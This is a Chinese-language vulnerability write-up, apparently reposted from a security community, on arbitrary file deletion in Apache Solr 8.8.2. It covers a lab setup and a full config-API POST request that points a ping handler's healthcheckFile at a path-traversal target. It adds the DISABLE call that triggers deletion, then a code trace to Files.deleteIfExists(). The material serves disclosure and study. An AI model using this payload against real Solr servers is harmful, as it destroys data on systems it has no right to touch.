-
作者:Whippet
-
来源:SecIN社区
漏洞简介
Apache Solr 存在任意文件删除漏洞,在目前的最新版本(8.8.2)中仍然未被修复,漏洞的根本成因是函数 Files.deleteIfExists()
对要删除的文件名并未做校验。同时 Apache Solr Config Api 对外开放,导致任意用户可修改配置,造成危害。
漏洞复现
环境搭建,下载符合存在漏洞的 Apache Solr 版本:Apache Solr 8.8.2,同时下载源码文件和二进制文件,方便进行调试。
tar -zxvf solr-8.8.2.tgz
cd solr-8.8.2/bin/
./solr -c -f -a "-Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=18522" -p 8983 # 以 Debug 模式启动
./solr create -c test_solr #创建一个数据驱动模式的核心
在 /tmp 目录下创建 test.txt
向 core 的 config API 发送 POST 数据包,
POST /solr/test_solr/config HTTP/1.1
Host: 192.168.198.132:8983
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-type:application/json
Content-Length: 224
{
"add-requesthandler": {
"name": "/test_solr",
"class":"solr.PingRequestHandler",
"defaults":{"echoParams":"explicit"},
"healthcheckFile":"../../../../../../../../../../../../../tmp/test.txt",
}
}
设定 healthcheckFile 为要删除的文件,如果提示路径已存在,可以利用 update-requesthandler
来设定参数
查看设定的参数是否创建成功
http://192.168.198.132/solr/test_solr/config/overlay?omitHeader=true
http://192.168.198.132/solr/test_solr/test_solr?action=DISABLE
文件成功被删除
漏洞分析
启动 idea 开启 调试环境
通过 config api 设置 healthcheckFile,Solr 提供给管理员方便管理的配置 api,属于正常功能,由于 Solr 默认安装为未授权,所以攻击者可以直接配置 config api 。(CVE-2019-17558)
requestHandler 就是请求处理程序,定义了 solr 接收到请求后应该做什么样的操作。每类服务在 solr 中都有对应的 request handler 接收处理数据,solr 中有定义了很多内置的请求处理程序,也可以通过配置 conf/solrconfig.xml
来实现自定义的请求处理。
<requestHandler name="/query" class="solr.SearchHandler">
所以针对 Apache Solr 的漏洞,只需要通过定位到内部漏洞的位置,就可以直接通过设定 config api 直接触发
org.apache.solr.handler.PingRequestHandler#handleRequestBody
org.apache.solr.handler.PingRequestHandler#handleEnable
此处用了 函数 Files.deleteIfExists()
实现对文件的删除
我们查看 healthcheck
值的来源
参考文章
Apache Solr <= 8.8.2(最新)任意文件删除
来源:freebuf.com 2021-06-16 11:19:14 by: SecIN技术社区
请登录后发表评论
注册